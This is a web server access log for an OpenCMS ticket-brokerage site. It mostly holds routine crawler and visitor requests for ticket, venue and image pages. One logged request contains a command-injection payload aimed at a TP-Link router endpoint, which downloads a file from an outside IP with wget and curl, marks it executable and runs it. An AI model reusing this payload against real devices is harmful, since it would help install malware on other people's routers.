217.113.194.221 - - [19/Jul/2024:04:29:24 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=CB858627-FD0B-7DB5-96E3-81B2EDFB367F HTTP/1.1" 200 82380
37.60.249.191 - - [19/Jul/2024:04:29:27 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EA6B7FBB-FA78-046C-4294-B3C3C2130B5E&sortorder=asc&column=price HTTP/1.1" 404 -
37.123.143.245 - - [19/Jul/2024:04:29:28 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:04:29:28 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
217.113.194.215 - - [19/Jul/2024:04:29:33 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=56CBA715-B928-D58F-6A08-8D95645745F0 HTTP/1.1" 200 97885
47.128.52.227 - - [19/Jul/2024:04:29:41 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=00D90EDA-80F2-743F-0F4B-D64BDD1F85D9 HTTP/1.1" 200 96727
47.128.52.227 - - [19/Jul/2024:04:29:41 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.52.227 - - [19/Jul/2024:04:29:42 +0200] "GET /ticket2/opencms/venue/stamford_bridge.png HTTP/1.1" 200 51972
66.249.79.172 - - [19/Jul/2024:04:29:42 +0200] "GET /ticket2/opencms/fi/venue/?venueid=F99FA4B1-E808-5056-52CC-0AD4662D7A43 HTTP/1.1" 200 72307
217.113.194.218 - - [19/Jul/2024:04:29:42 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=9F2135C0-926A-6F2D-349D-384B068ADC1C HTTP/1.1" 200 101861
47.128.52.227 - - [19/Jul/2024:04:29:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
47.128.52.227 - - [19/Jul/2024:04:29:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
47.128.52.227 - - [19/Jul/2024:04:29:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.76.132 - - [19/Jul/2024:04:29:42 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=3D8F79F4-A4D7-A330-BF52-9DC53BC71CBE HTTP/1.1" 200 88085
47.128.52.227 - - [19/Jul/2024:04:29:43 +0200] "GET /ticket2/opencms/en/ask-form.html HTTP/1.1" 200 3146
154.54.249.216 - - [19/Jul/2024:04:29:50 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=684F42AD-E69E-B0FB-F34B-E9B5D5266D07 HTTP/1.1" 200 84026
154.54.249.216 - - [19/Jul/2024:04:29:59 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=4F6C281E-0307-3DEA-5C89-32A309F90298 HTTP/1.1" 200 100916
47.128.33.103 - - [19/Jul/2024:04:30:05 +0200] "GET /ticket2/opencms/nl/buy/?catid=5A89E483-58AD-080E-F363-E16CE738916A&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 81207
47.128.33.103 - - [19/Jul/2024:04:30:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
47.128.33.103 - - [19/Jul/2024:04:30:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.33.103 - - [19/Jul/2024:04:30:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.113.194.216 - - [19/Jul/2024:04:30:07 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A4D9EA9A-192D-0274-BF26-9C98D8B902AB&eventid=C7B8839D-D05D-58E7-D08F-88E8ADCFDD77 HTTP/1.1" 200 81575
37.60.249.191 - - [19/Jul/2024:04:30:10 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EA6B7FBB-FA78-046C-4294-B3C3C2130B5E&sortorder=asc&column=section HTTP/1.1" 404 -
217.113.194.217 - - [19/Jul/2024:04:30:16 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=4F6C281E-0307-3DEA-5C89-32A309F90298 HTTP/1.1" 200 102422
66.249.79.171 - - [19/Jul/2024:04:30:17 +0200] "GET /ticket2/opencms/en/venue/?countryid=A4DD8A66-89A9-9256-5B01-F5C6EA7FFD86 HTTP/1.1" 200 100788
217.182.175.146 - - [19/Jul/2024:04:30:25 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=0B5441DB-65AE-25E2-D66F-B709450A0E12&sortorder=desc&column=section HTTP/1.1" 200 86787
217.113.194.218 - - [19/Jul/2024:04:30:25 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=66D77204-4B8D-B660-88DB-7A93BC4629FF HTTP/1.1" 200 102495
47.128.56.105 - - [19/Jul/2024:04:30:30 +0200] "GET /ticket2/opencms/fi/venue/?countryid=D3DB55BA-ABAE-0702-A973-202744AB3BB9 HTTP/1.1" 200 101663
47.128.56.105 - - [19/Jul/2024:04:30:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
47.128.56.105 - - [19/Jul/2024:04:30:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
217.182.175.146 - - [19/Jul/2024:04:30:32 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=0B96E2DD-25FC-BCDF-58F0-8F3CC908DB91&sortorder=desc&column=price HTTP/1.1" 200 84580
47.128.56.105 - - [19/Jul/2024:04:30:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.56.105 - - [19/Jul/2024:04:30:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.113.194.215 - - [19/Jul/2024:04:30:34 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=E1F7E93A-157E-48B5-16F5-20CB837CCB35 HTTP/1.1" 200 100870
217.182.175.146 - - [19/Jul/2024:04:30:40 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=1C69DA4F-7050-50D8-FA95-BC2C5CCA0334 HTTP/1.1" 200 87869
66.249.79.172 - - [19/Jul/2024:04:30:44 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=0DB336ED-B184-1B25-4EA8-B6E94BBC2DBC HTTP/1.1" 200 110462
217.182.175.146 - - [19/Jul/2024:04:30:48 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=91851CE1-DEEA-F6FA-15A7-E92688F40B77&sortorder=asc&column=section HTTP/1.1" 200 87901
37.60.249.191 - - [19/Jul/2024:04:30:54 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EDD921C3-85E0-12A1-A432-98789C28A5CD&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.126.155 - - [19/Jul/2024:04:30:55 +0200] "GET /ticket2/opencms/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=573B7747-EE85-D769-C87D-F3F61FB64AA5 HTTP/1.1" 200 82824
47.128.42.39 - - [19/Jul/2024:04:30:55 +0200] "GET /ticket2/opencms/fr/buy/?edid=382200F9-A319-F215-14F8-C7B4677A39A9 HTTP/1.1" 200 72058
47.128.126.155 - - [19/Jul/2024:04:30:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.42.39 - - [19/Jul/2024:04:30:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.126.155 - - [19/Jul/2024:04:30:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.42.39 - - [19/Jul/2024:04:30:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.182.175.146 - - [19/Jul/2024:04:30:57 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=05830326-E938-DFB4-74E5-FF7CC7B035C5 HTTP/1.1" 200 87534
154.54.249.216 - - [19/Jul/2024:04:30:59 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=2E8FEED6-8FAD-B0D7-22BA-E6EFDA36827A HTTP/1.1" 200 101032
217.113.194.215 - - [19/Jul/2024:04:31:07 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=4BFE0049-E26D-F28C-59BF-33D4A5B123CD HTTP/1.1" 200 85257
217.182.175.146 - - [19/Jul/2024:04:31:08 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1A8318F4-54FD-CF28-6FE4-70A4EF1323B0&sortorder=desc&column=price HTTP/1.1" 200 89225
66.249.76.160 - - [19/Jul/2024:04:31:14 +0200] "GET /ticket2/opencms/it/ HTTP/1.1" 200 95797
217.113.194.212 - - [19/Jul/2024:04:31:16 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=13E1C110-1E7D-C595-FE36-DCFCB7E73161 HTTP/1.1" 200 101843
47.128.29.92 - - [19/Jul/2024:04:31:19 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=24AC1CA6-1C09-0BE5-C04A-9DCCDB15D5E9 HTTP/1.1" 200 82374
47.128.29.92 - - [19/Jul/2024:04:31:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.29.92 - - [19/Jul/2024:04:31:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.113.194.219 - - [19/Jul/2024:04:31:25 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=CD5CAC79-CCCB-BB8B-4538-6E9C8B5338ED HTTP/1.1" 200 84026
37.60.249.191 - - [19/Jul/2024:04:31:30 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EDD921C3-85E0-12A1-A432-98789C28A5CD&sortorder=asc&column=section HTTP/1.1" 404 -
217.113.194.221 - - [19/Jul/2024:04:31:41 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=ADB4BA94-4A6D-0826-5992-F7DEA47BAAA3 HTTP/1.1" 200 99273
47.128.56.133 - - [19/Jul/2024:04:31:44 +0200] "GET /ticket2/opencms/fi/venue/?countryid=C8ABE51D-DDC3-D19F-A0F7-AA8797A5EB51 HTTP/1.1" 200 101663
47.128.56.133 - - [19/Jul/2024:04:31:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.56.133 - - [19/Jul/2024:04:31:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.153.211 - - [19/Jul/2024:04:31:47 +0200] "GET /ticket2/opencms/en/venue/?countryid=947940C4-79F7-1AE9-A4BA-06096E0B9585 HTTP/1.1" 200 100101
217.113.194.221 - - [19/Jul/2024:04:31:50 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=A2BBF8F5-73FD-205D-F6D5-00395D8DDE9D HTTP/1.1" 200 101666
217.113.194.216 - - [19/Jul/2024:04:31:59 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=A7E64A15-C7DF-043E-0070-D601DF6CEDE4 HTTP/1.1" 200 85779
47.128.110.116 - - [19/Jul/2024:04:32:08 +0200] "GET /ticket2/opencms/dk/buy/?catid=5A89E483-58AD-080E-F363-E16CE738916A&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82265
47.128.110.116 - - [19/Jul/2024:04:32:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.110.116 - - [19/Jul/2024:04:32:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.76.170 - - [19/Jul/2024:04:32:13 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/barcelona/ HTTP/1.1" 200 86525
114.119.158.193 - - [19/Jul/2024:04:32:16 +0200] "GET /ticket2/opencms/en/venue/?venueid=CC8EBEE0-20C4-450E-B0B6-DECB88FE890B HTTP/1.1" 200 70740
217.113.194.212 - - [19/Jul/2024:04:32:16 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=0BEF98A6-2B0A-52D4-B6BB-81FFC5157036 HTTP/1.1" 200 86443
216.244.66.245 - - [19/Jul/2024:04:32:17 +0200] "GET /ticket2/opencms/se/robots.txt HTTP/1.1" 404 -
66.249.76.160 - - [19/Jul/2024:04:32:20 +0200] "GET /ticket2/opencms/dk/buy?page=1&edid=6749402D-C332-2C4D-9191-3C983EDD528C HTTP/1.1" 200 111337
37.60.249.191 - - [19/Jul/2024:04:32:20 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EE72AC60-CA9C-96B1-E30F-3118332B8F09&sortorder=asc&column=price HTTP/1.1" 404 -
66.249.79.173 - - [19/Jul/2024:04:32:21 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=979A80EE-C0D2-57E0-C882-1064B868BC30 HTTP/1.1" 200 102286
66.249.79.5 - - [19/Jul/2024:04:32:22 +0200] "GET /ticket2/opencms/en/venue/?venueid=2D54B7AC-88C2-7CD2-9B48-9538BFBB860A HTTP/1.1" 200 70779
217.113.194.212 - - [19/Jul/2024:04:32:24 +0200] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&eventid=ADB4BA94-4A6D-0826-5992-F7DEA47BAAA3 HTTP/1.1" 200 98620
217.113.194.218 - - [19/Jul/2024:04:32:33 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=0BEF98A6-2B0A-52D4-B6BB-81FFC5157036 HTTP/1.1" 200 86234
47.128.98.43 - - [19/Jul/2024:04:32:34 +0200] "GET /ticket2/opencms/no/buy/?catid=A3372871-3019-08B8-80CE-74B78F441ACA&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83108
47.128.98.43 - - [19/Jul/2024:04:32:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.98.43 - - [19/Jul/2024:04:32:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
63.143.42.252 - - [19/Jul/2024:04:32:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
217.113.194.221 - - [19/Jul/2024:04:32:42 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=E1F7E93A-157E-48B5-16F5-20CB837CCB35 HTTP/1.1" 200 100015
84.54.51.37 - - [19/Jul/2024:04:32:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>+cd+%2Ftmp+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+curl+-O+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+%2Bx+r%3B+.%2Fr%20tplink) HTTP/1.1" 400 -
63.143.42.252 - - [19/Jul/2024:04:32:45 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
66.249.79.231 - - [19/Jul/2024:04:32:46 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=67D9BDEC-57DC-5BC5-B6FB-C7074FDCD450 HTTP/1.1" 200 96131
37.60.249.191 - - [19/Jul/2024:04:32:50 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EE72AC60-CA9C-96B1-E30F-3118332B8F09&sortorder=asc&column=row HTTP/1.1" 404 -
154.54.249.216 - - [19/Jul/2024:04:32:50 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=9C5E6DD4-F64D-20CA-9106-5C6F22EC8E88 HTTP/1.1" 200 86191
114.119.132.248 - - [19/Jul/2024:04:32:51 +0200] "GET /ticket2/opencms/en/venue/?venueid=23DADC67-2F89-C2AE-F234-7909D8077B49 HTTP/1.1" 200 70730
47.128.55.206 - - [19/Jul/2024:04:32:59 +0200] "GET /ticket2/opencms/no/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=AE8A6CAA-9529-DB54-69E5-B3169B36CD6E&page=6 HTTP/1.1" 200 99252
47.128.55.206 - - [19/Jul/2024:04:33:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.55.206 - - [19/Jul/2024:04:33:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.113.194.220 - - [19/Jul/2024:04:33:07 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=883106CC-5563-BF81-1FC9-D3F6F4B0585E HTTP/1.1" 200 86234
47.128.54.209 - - [19/Jul/2024:04:33:12 +0200] "GET /ticket2/opencms/es/buy/?edid=D67B497F-CF10-C7AE-77D9-D57AFD6ED0DB HTTP/1.1" 200 72706
47.128.54.209 - - [19/Jul/2024:04:33:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.54.209 - - [19/Jul/2024:04:33:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.113.194.212 - - [19/Jul/2024:04:33:16 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&eventid=A7E64A15-C7DF-043E-0070-D601DF6CEDE4 HTTP/1.1" 200 84955
47.128.126.166 - - [19/Jul/2024:04:33:23 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4 HTTP/1.1" 200 175354
47.128.126.166 - - [19/Jul/2024:04:33:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.126.166 - - [19/Jul/2024:04:33:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.154.89 - - [19/Jul/2024:04:33:29 +0200] "GET /ticket2/opencms/en/venue/?venueid=47A584F0-253C-EAFC-960C-A197E0BFF841 HTTP/1.1" 200 70703
37.60.249.191 - - [19/Jul/2024:04:33:30 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=EE72AC60-CA9C-96B1-E30F-3118332B8F09&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.98.235 - - [19/Jul/2024:04:33:47 +0200] "GET /ticket2/opencms/nl/buy/?catid=36394212-F82E-F845-399B-42BED55969CC&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=7 HTTP/1.1" 200 80621
47.128.98.235 - - [19/Jul/2024:04:33:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.98.235 - - [19/Jul/2024:04:33:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
93.158.90.65 - - [19/Jul/2024:04:33:49 +0200] "GET /ticket2/opencms/it/robots.txt HTTP/1.1" 404 -
93.158.90.73 - - [19/Jul/2024:04:33:49 +0200] "GET /ticket2/opencms/it/ HTTP/1.1" 200 95797
47.128.23.203 - - [19/Jul/2024:04:34:07 +0200] "GET /ticket2/opencms/fi/?comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 200 95653
47.128.23.203 - - [19/Jul/2024:04:34:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.23.203 - - [19/Jul/2024:04:34:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.60.249.191 - - [19/Jul/2024:04:34:09 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F200B65F-8C67-A9E3-E084-BE71F9119C17 HTTP/1.1" 404 -
47.128.42.14 - - [19/Jul/2024:04:34:11 +0200] "GET /ticket2/opencms/fi/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=894DC58A-C9B9-A619-22E1-739D490A607E&page=7 HTTP/1.1" 200 98213
47.128.42.14 - - [19/Jul/2024:04:34:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.42.14 - - [19/Jul/2024:04:34:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.79.171 - - [19/Jul/2024:04:34:24 +0200] "GET /ticket2/opencms/fi/venue/?venueid=CA2773F8-740F-6352-4AEF-6499F28E0684 HTTP/1.1" 200 72283
37.123.143.245 - - [19/Jul/2024:04:34:28 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:04:34:28 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
217.182.175.146 - - [19/Jul/2024:04:34:32 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1F546517-7633-42B2-A140-E9D704EF0B28&sortorder=desc&column=section HTTP/1.1" 200 88536
37.60.249.191 - - [19/Jul/2024:04:34:36 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F200B65F-8C67-A9E3-E084-BE71F9119C17&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.121.211 - - [19/Jul/2024:04:34:38 +0200] "GET /ticket2/opencms/fi/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=BE041FBE-C1A7-918C-EB61-99ED02D12F5B HTTP/1.1" 200 83395
47.128.121.211 - - [19/Jul/2024:04:34:38 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.121.211 - - [19/Jul/2024:04:34:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.182.175.146 - - [19/Jul/2024:04:34:40 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1FCA645A-DEE0-EC18-0DE3-82C0541BBA3A&sortorder=asc&column=price HTTP/1.1" 200 87994
114.119.155.23 - - [19/Jul/2024:04:34:42 +0200] "GET /ticket2/opencms/en/venue/?countryid=56FE8DB8-0A46-00E3-175D-347FD72BDA70 HTTP/1.1" 200 100791
217.182.175.146 - - [19/Jul/2024:04:34:48 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=782DA820-81A9-DE17-547C-521616A84CAF&sortorder=desc&column=section HTTP/1.1" 200 89219
66.249.76.167 - - [19/Jul/2024:04:34:48 +0200] "GET /ticket2/opencms/fi/venue/?venueid=FD61FD0F-7893-095D-0FF7-17503C5C1517 HTTP/1.1" 200 72295
66.249.79.171 - - [19/Jul/2024:04:34:49 +0200] "GET /ticket2/opencms/fi/venue/?venueid=D4784E51-1C45-CBDB-BB13-DEF8FB831FB5 HTTP/1.1" 200 72264
217.182.175.146 - - [19/Jul/2024:04:34:54 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=7911312C-1225-8A9E-7A3D-35D79ED30B2F&sortorder=desc&column=price HTTP/1.1" 200 87425
47.128.23.250 - - [19/Jul/2024:04:34:57 +0200] "GET /ticket2/opencms/nl/buy/?catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=ADB4BA94-4A6D-0826-5992-F7DEA47BAAA3&page=6 HTTP/1.1" 200 97374
47.128.23.250 - - [19/Jul/2024:04:34:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.23.250 - - [19/Jul/2024:04:34:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.28.74 - - [19/Jul/2024:04:35:01 +0200] "GET /ticket2/opencms/de/magazine/article?title=chelsea-fcs-und-ihr-kampf-um-stabilitat HTTP/1.1" 200 75163
47.128.28.74 - - [19/Jul/2024:04:35:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.28.74 - - [19/Jul/2024:04:35:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.60.249.191 - - [19/Jul/2024:04:35:05 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F238AE7A-032C-1CDD-E544-E70E0C5C5606&sortorder=asc&column=section HTTP/1.1" 404 -
66.249.79.233 - - [19/Jul/2024:04:35:14 +0200] "GET /ticket2/opencms/dk/ask-form.html HTTP/1.1" 200 2971
